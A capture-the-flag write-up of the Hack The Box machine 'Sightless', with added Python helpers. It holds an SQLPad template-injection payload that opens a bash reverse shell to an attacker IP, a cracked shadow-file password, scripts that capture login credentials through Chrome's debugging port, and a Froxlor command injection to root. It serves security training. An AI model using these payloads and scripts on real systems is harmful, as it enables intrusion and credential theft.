Hackthebox: Sightless

Foued SAIDI

Overview

Sightless is an easy-difficulty Hack The Box machine. The chain is: Remote Code Execution in an SQLPad instance exposed on a subdomain, which lands us in a Docker container; reading /etc/shadow from that container and cracking a user hash to get SSH access; abusing a Chrome remote-debugging port to watch a scripted browser session log in to Froxlor and capture the admin password; and finally command injection through Froxlor's PHP-FPM restart command to read the root flag.


Reconnaissance

PS C:\Users\0xkujen> nmap -A -Pn 10.129.231.103
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-11 10:13 W. Central Africa Standard Time
Nmap scan report for 10.129.231.103
Host is up (0.14s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.129.231.103]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_ 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://sightless.htb/
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.95%I=7%D=1/11%Time=6782365D%P=i686-pc-windows-windows%r(
SF:GenericLines,A3,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\x2
SF:0Server\)\x20\[::ffff:10\.129\.231\.103\]\r\n500\x20Invalid\x20command:
SF:\x20try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20t
SF:ry\x20being\x20more\x20creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.27 seconds

We can see that FTP, SSH and HTTP are reachable. The FTP banner names the host sightless.htb and HTTP redirects to http://sightless.htb/, so let’s add that entry to our /etc/hosts file.

Web Application - http://sightless.htb

Web App

This website doesn’t seem to have anything special; scrolling down a bit we can see a few of the offered services:

Web App

A common developer mistake with a subdomain that isn’t meant to be public yet (still under development) is to name it after the feature it hosts. Let’s add those words [“sqlpad”, “froxlor”] to our wordlist and fuzz for virtual hosts:
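The vhost check described above, written out as an added example in Python (this is not code from the original write-up). It builds hostnames from the feature names on the landing page, fetches the site once with a random Host header to learn what nginx’s default vhost answers, and reports every guessed name whose response differs from that baseline; the “admin” word and the target URL are assumptions.

```python
import secrets
import urllib.error
import urllib.request

# Feature names taken from the landing page; "admin" is an extra guess (an assumption),
# since hosting panels such as Froxlor are often published on an admin.* vhost.
FEATURE_WORDS = ["sqlpad", "froxlor", "admin"]


def candidates(words, domain):
    """Turn guessed feature names into hostnames to try (lower-cased, deduplicated)."""
    seen, out = set(), []
    for w in words:
        name = f"{w.strip().lower()}.{domain}"
        if name not in seen:
            seen.add(name)
            out.append(name)
    return out


def fetch(base_url, host, timeout=5):
    """GET base_url with an overridden Host header; return (status, body_length).

    Redirects are deliberately not followed, so the default vhost's
    "301 to http://sightless.htb/" stays distinguishable from an application page.
    """
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # make urllib raise HTTPError instead of following

    opener = urllib.request.build_opener(NoRedirect)
    req = urllib.request.Request(base_url, headers={"Host": host})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as e:  # 3xx/4xx/5xx responses still carry a body
        return e.code, len(e.read())


def find_vhosts(words, domain, base_url, timeout=5):
    """Return (host, status, size) for guessed names that differ from the catch-all vhost.

    The baseline is fetched with a random Host so nginx's default-server answer
    (same status and size for every unknown name) can be filtered out; this is
    the same idea as ffuf's -fs/-fc filters.
    """
    try:
        baseline = fetch(base_url, f"{secrets.token_hex(6)}.{domain}", timeout)
    except (urllib.error.URLError, OSError):
        return []  # target unreachable, nothing to compare against
    hits = []
    for host in candidates(words, domain):
        try:
            status, size = fetch(base_url, host, timeout)
        except (urllib.error.URLError, OSError):
            continue
        if (status, size) != baseline:
            hits.append((host, status, size))
    return hits


if __name__ == "__main__":
    # Target IP from the nmap scan above; the base URL is by IP so only the Host header varies.
    for host, status, size in find_vhosts(FEATURE_WORDS, "sightless.htb", "http://10.129.231.103/"):
        print(f"{host}: HTTP {status}, {size} bytes")
```

A hit still needs a look by hand: a name that returns a different 404 page is also “different”, so compare status and size before trusting it, exactly as you would with ffuf output.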

SQLPad

And yes! We got access to an SQLPad subdomain.

Searching the web for exploits related to SQLPad, I stumbled on this report from https://huntr.com

It describes a Remote Code Execution vulnerability: when a new MySQL connection is added, one of the connection fields is passed through a template engine, so a template expression in that field is evaluated server-side with the privileges of the SQLPad process. Let’s do it!

SQLPad

This will be our payload:

{{ process.mainModule.require('child_process').exec('bash -c "bash -i >& /dev/tcp/10.10.x.x/4444 0>&1"') }}

And we get a callback:

PS C:\Users\0xkujen> nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.231.103] 47218
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c184118df0a6:/var/lib/sqlpad# id
id
uid=0(root) gid=0(root) groups=0(root)
root@c184118df0a6:/var/lib/sqlpad#

However, the hostname c184118df0a6 gives it away: this is only a Docker container, not the host itself.

User Pivoting - Michael

Doing my usual checks, I found that I could read the container’s /etc/shadow file (which holds the users’ password hashes):

root@c184118df0a6:/var/lib/sqlpad# cat /etc/shadow
cat /etc/shadow
root:$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b.:19858:0:99999:7:::
daemon:*:19051:0:99999:7:::
bin:*:19051:0:99999:7:::
sys:*:19051:0:99999:7:::
sync:*:19051:0:99999:7:::
games:*:19051:0:99999:7:::
man:*:19051:0:99999:7:::
lp:*:19051:0:99999:7:::
mail:*:19051:0:99999:7:::
news:*:19051:0:99999:7:::
uucp:*:19051:0:99999:7:::
proxy:*:19051:0:99999:7:::
www-data:*:19051:0:99999:7:::
backup:*:19051:0:99999:7:::
list:*:19051:0:99999:7:::
irc:*:19051:0:99999:7:::
gnats:*:19051:0:99999:7:::
nobody:*:19051:0:99999:7:::
_apt:*:19051:0:99999:7:::
node:!:19053:0:99999:7:::
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::
root@c184118df0a6:/var/lib/sqlpad#

We can see a michael user with a real hash; every other account except root is locked (* or ! instead of a hash). Let’s grab the hash and try to crack it. Saving the line as michael:<hash> rather than the bare hash would make john print the username instead of (?):

┌──(kali㉿kali)-[~]
└─$ john -w=/usr/share/wordlists/rockyou.txt hash
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
insaneclownposse (?)
1g 0:00:00:17 DONE (2025-01-11 11:01) 0.05672g/s 3325p/s 3325c/s 3325C/s kruimel..galati
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(kali㉿kali)-[~]
└─$ cat hash
$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/

┌──(kali㉿kali)-[~]
└─$
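As an added example (not part of the original write-up), a small Python helper for the step above: it parses a shadow file, separates locked accounts from ones that carry a hash, identifies the crypt(3) algorithm from the prefix together with the matching hashcat mode, and emits john-ready user:hash lines. The sample input is constructed from the container’s file (root’s and michael’s hashes are the real ones; the svc and legacy lines are made up to show the edge cases).

```python
# Constructed /etc/shadow sample: root and michael are the real lines from the container,
# svc (locked with "passwd -l", hash still present) and legacy (md5crypt) are made up.
SAMPLE_SHADOW = """\
root:$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b.:19858:0:99999:7:::
daemon:*:19051:0:99999:7:::
node:!:19053:0:99999:7:::
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::
svc:!$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::
legacy:$1$abcdefgh$0123456789abcdefghijkl:19000:0:99999:7:::
"""

# crypt(3) prefix -> (algorithm name, hashcat -m mode). yescrypt has no hashcat mode.
HASH_TYPES = {
    "$1$": ("md5crypt", 500),
    "$2a$": ("bcrypt", 3200),
    "$2b$": ("bcrypt", 3200),
    "$2y$": ("bcrypt", 3200),
    "$5$": ("sha256crypt", 7400),
    "$6$": ("sha512crypt", 1800),
    "$y$": ("yescrypt", None),
}


def parse_shadow(text):
    """Yield (user, hash, state) per line.

    state is one of:
      empty       - no password at all (login without password may be possible)
      locked      - "*", "!" or "!!": no hash, nothing to crack
      locked_hash - "!" in front of a real hash (passwd -l): login is blocked,
                    but the hash is still crackable and the password may be reused
      hashed      - a normal crypt(3) hash
    """
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, pw = fields[0], fields[1]
        if pw == "":
            state = "empty"
        elif pw.startswith("!") and pw[1:].startswith("$"):
            state, pw = "locked_hash", pw[1:]
        elif pw.startswith(("*", "!")):
            state = "locked"
        else:
            state = "hashed"
        yield user, pw, state


def hash_type(pw):
    """Return (algorithm name, hashcat mode) for a crypt(3) string, or ("unknown", None)."""
    for prefix, info in HASH_TYPES.items():
        if pw.startswith(prefix):
            return info
    return ("unknown", None)


def crackable(text):
    """john-ready 'user:hash' lines for every account that actually carries a hash."""
    return [f"{u}:{h}" for u, h, s in parse_shadow(text) if s in ("hashed", "locked_hash")]


if __name__ == "__main__":
    for user, pw, state in parse_shadow(SAMPLE_SHADOW):
        if state in ("hashed", "locked_hash"):
            name, mode = hash_type(pw)
            print(f"{user}: {state}, {name}, hashcat -m {mode}")
    print("\n".join(crackable(SAMPLE_SHADOW)))
```

Write the crackable() lines to a file and run john as above, or hashcat with the mode the script prints (sha512crypt is -m 1800); the locked_hash case is the one people miss, since a locked account’s password is often still valid for SSH as another user or for a web panel.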

So michael’s password is insaneclownposse. Let’s check whether it is reused for SSH on the main machine and grab our user flag:

michael@sightless:~$ cat user.txt
71febbb47666ca******************
michael@sightless:~$

Privilege Escalation - Chrome Remote Debugger to RCE

Checking which services are listening on the machine, we find some interesting ports:

michael@sightless:~$ netstat -anot
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 127.0.0.1:33011 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:43425 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:37621 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:42634 127.0.0.1:37621 ESTABLISHED off (0.00/0/0)
tcp 0 0 127.0.0.1:8080 127.0.0.1:53488 ESTABLISHED keepalive (7194.60/0/0)
tcp 0 0 127.0.0.1:8080 127.0.0.1:56136 TIME_WAIT timewait (13.28/0/0)
tcp 0 0 127.0.0.1:8080 127.0.0.1:43552 TIME_WAIT timewait (54.60/0/0)
tcp 0 232 10.129.231.103:22 10.10.x.x:30607 ESTABLISHED on (0.32/0/0)
tcp 0 0 127.0.0.1:50152 127.0.0.1:43425 ESTABLISHED keepalive (28.62/0/0)
tcp 0 0 127.0.0.1:43425 127.0.0.1:50152 ESTABLISHED keepalive (28.62/0/0)
tcp 0 0 127.0.0.1:53492 127.0.0.1:8080 TIME_WAIT timewait (55.57/0/0)
tcp 0 0 127.0.0.1:37621 127.0.0.1:42634 ESTABLISHED keepalive (24.28/0/0)
tcp 0 0 127.0.0.1:8080 127.0.0.1:35154 TIME_WAIT timewait (39.10/0/0)
tcp 0 1 10.129.231.103:46100 8.8.8.8:53 SYN_SENT on (1.39/1/0)
tcp 0 0 127.0.0.1:53488 127.0.0.1:8080 ESTABLISHED keepalive (39.60/0/0)
tcp 0 0 127.0.0.1:50154 127.0.0.1:43425 ESTABLISHED keepalive (8.83/0/0)
tcp 0 0 127.0.0.1:8080 127.0.0.1:35014 TIME_WAIT timewait (8.02/0/0)
tcp 0 0 127.0.0.1:8080 127.0.0.1:34976 TIME_WAIT timewait (23.62/0/0)
tcp 0 0 127.0.0.1:43425 127.0.0.1:50154 ESTABLISHED keepalive (8.88/0/0)
tcp6 0 0 :::22 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::21 :::* LISTEN off (0.00/0/0)
michael@sightless:~$

Froxlor is running on port 8080 (we already saw it advertised on the landing page). The process list also shows Chrome being driven by chromedriver, which is what made me think of this article.
Chrome started with remote debugging, and chromedriver itself, each listen on a random high-numbered loopback port; those are the odd-looking LISTEN entries above (33011, 43425 and 37621 here), as opposed to the fixed, well-known ports. Only the LISTEN sockets matter: entries such as 42634 or 50152 are the client ends of the same connections and do not need forwarding. Let’s forward 8080 together with those ports to our box, keeping the same local port number for each, because the DevTools endpoint advertises its WebSocket URL with the port it listens on and chrome://inspect follows that URL:

PS C:\Users\0xkujen> ssh  -L 8080:sightless.htb:8080 -L 42634:sightless.htb:42634 -L 34956:localhost:34956 -L 50152:localhost:50152 -L 43425:localhost:43425 -L 37621:localhost:37621 -L 50154:localhost:50154 -L 43425:localhost:43425 michael@sightless.htb
michael@sightless.htb's password:
bind [127.0.0.1]:42634: Permission denied
channel_setup_fwd_listener_tcpip: cannot listen to port: 42634
bind [127.0.0.1]:43425: Permission denied
channel_setup_fwd_listener_tcpip: cannot listen to port: 43425
Last login: Sat Jan 11 10:20:21 2025 from 10.10.x.x
michael@sightless:~$

(these ports change on every boot, so update them before forwarding)
Next, open Google Chrome and navigate to chrome://inspect/#devices. Under Configure, add each forwarded port as localhost:<port> until a remote target appears. Click “Inspect” to open DevTools for that target, switch to the “Network” tab and wait for the scripted browser session on the box to submit the Froxlor login form.
The POST request to index.php carries the form data, including the credentials for the login portal on localhost:8080:
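The same two steps scripted in Python, as an added example (not code from the original write-up or from Chrome): first pick the loopback LISTEN ports out of the netstat output and ask each one for the DevTools /json/list target list, which is exactly what chrome://inspect does for every localhost:<port> you configure; then sift Network.requestWillBeSent events for POST bodies that look like a login. The netstat sample is a subset of the output above, the events are constructed, and the Froxlor field names (loginname, password) are an assumption.

```python
import json
import re
import urllib.error
import urllib.request
from urllib.parse import parse_qs

# Constructed subset of the `netstat -anot` output from the box.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 127.0.0.1:33011 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:43425 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:37621 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:42634 127.0.0.1:37621 ESTABLISHED off (0.00/0/0)
"""

# Constructed Chrome DevTools Protocol events, as received after Network.enable.
# Field names in the form body are an assumption about Froxlor's login form.
SAMPLE_EVENTS = [
    {"method": "Network.requestWillBeSent", "params": {"requestId": "1", "request": {
        "url": "http://admin.sightless.htb:8080/index.php", "method": "GET", "headers": {}}}},
    {"method": "Network.requestWillBeSent", "params": {"requestId": "2", "request": {
        "url": "http://admin.sightless.htb:8080/index.php", "method": "POST",
        "headers": {"Content-Type": "application/x-www-form-urlencoded"},
        "hasPostData": True,
        "postData": "loginname=admin&password=ExamplePassword123&send=send"}}},
    {"method": "Network.requestWillBeSent", "params": {"requestId": "3", "request": {
        "url": "http://admin.sightless.htb:8080/upload.php", "method": "POST",
        "headers": {}, "hasPostData": True}}},  # body too large, not inlined by Chrome
    {"method": "Network.responseReceived", "params": {"requestId": "2"}},
]


def listening_ports(netstat_output):
    """Loopback LISTEN ports from `netstat -anot` style output (DevTools only binds 127.0.0.1)."""
    ports = set()
    for line in netstat_output.splitlines():
        m = re.search(r"\s127\.0\.0\.1:(\d+)\s+\S+\s+LISTEN", line)
        if m:
            ports.add(int(m.group(1)))
    return sorted(ports)


def discover_devtools(ports, host="127.0.0.1", timeout=2):
    """Return {port: [page targets]} for ports that answer the DevTools /json/list endpoint.

    Anything that refuses, times out or returns something other than a JSON list of
    targets (chromedriver, MySQL, Froxlor itself) is skipped.
    """
    found = {}
    for port in ports:
        try:
            with urllib.request.urlopen(f"http://{host}:{port}/json/list", timeout=timeout) as r:
                targets = json.load(r)
        except (urllib.error.URLError, OSError, ValueError):
            continue
        pages = [t for t in targets if isinstance(t, dict) and t.get("type") == "page"]
        if pages:
            found[port] = pages
    return found


CRED_KEYS = re.compile(r"(pass|pwd|login|user|token)", re.I)


def extract_credentials(events):
    """Return (hits, pending) from CDP events.

    hits    - (url, {field: value}) for POST bodies containing login-looking fields
    pending - requestIds whose body Chrome did not inline (only small bodies are);
              fetch those with Network.getRequestPostData {"requestId": id}
    """
    hits, pending = [], []
    for ev in events:
        if ev.get("method") != "Network.requestWillBeSent":
            continue
        params = ev["params"]
        req = params.get("request", {})
        if req.get("method") != "POST":
            continue
        body = req.get("postData")
        if body is None:
            if req.get("hasPostData"):
                pending.append(params["requestId"])
            continue
        form = {k: v[0] for k, v in parse_qs(body).items()}
        if any(CRED_KEYS.search(k) for k in form):
            hits.append((req["url"], form))
    return hits, pending


if __name__ == "__main__":
    for port, pages in discover_devtools(listening_ports(SAMPLE_NETSTAT)).items():
        for page in pages:
            print(port, page.get("url"), page.get("webSocketDebuggerUrl"))
    print(extract_credentials(SAMPLE_EVENTS))
```

Once discover_devtools() reports a target, open its webSocketDebuggerUrl (any WebSocket client will do), send {"id": 1, "method": "Network.enable"} and feed every incoming message to extract_credentials(); for ids listed in pending, send Network.getRequestPostData with that requestId to get the body. Running this directly on the box as michael (if a Python interpreter is available there) avoids the port-forwarding guesswork entirely, since the /json endpoint and the WebSocket are both on loopback.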

Froxlor

admin:ForlorfroxAdmin

And we’re in:

Froxlor

RCE to root using the PHP-FPM package

Checking the PHP-FPM settings, we see a restart command for the package that we are allowed to edit; it is executed as root whenever PHP-FPM is re-enabled, which makes it a straightforward command injection:

Froxlor

Let’s set it to copy the root flag to /tmp and then change its permissions. The command only runs when the setting is applied, so every time we change it we have to disable PHP-FPM and re-enable it from http://admin.sightless.htb:8080/admin_settings.php?page=overview&part=phpfpm:

Froxlor

Then disable and enable again:

Froxlor

michael@sightless:~$ ls /tmp
Crashpad
root.txt
systemd-private-b0a4883901934c469b86c2105ddc6b4d-apache2.service-LPF8fp
systemd-private-b0a4883901934c469b86c2105ddc6b4d-ModemManager.service-CnBX3D
systemd-private-b0a4883901934c469b86c2105ddc6b4d-systemd-logind.service-NqNnkU
systemd-private-b0a4883901934c469b86c2105ddc6b4d-systemd-resolved.service-PJrWDg
systemd-private-b0a4883901934c469b86c2105ddc6b4d-systemd-timesyncd.service-AUiPUV
vmware-root_790-2965972456
michael@sightless:~$

Do the same again with a chmod that makes the copy readable by everyone (both steps could also be chained in a single command), then read the root flag:

michael@sightless:/tmp$ cat root.txt
98109e1ce28830******************
michael@sightless:/tmp$
  • Title: Hackthebox: Sightless
  • Author: Foued SAIDI
  • Created at: 2025-01-11 09:56:11
  • Updated at: 2025-01-11 11:45:44
  • Link: https://kujen5.github.io/2025/01/11/Hackthebox-Sightless/
  • License: This work is licensed under CC BY-NC-SA 4.0.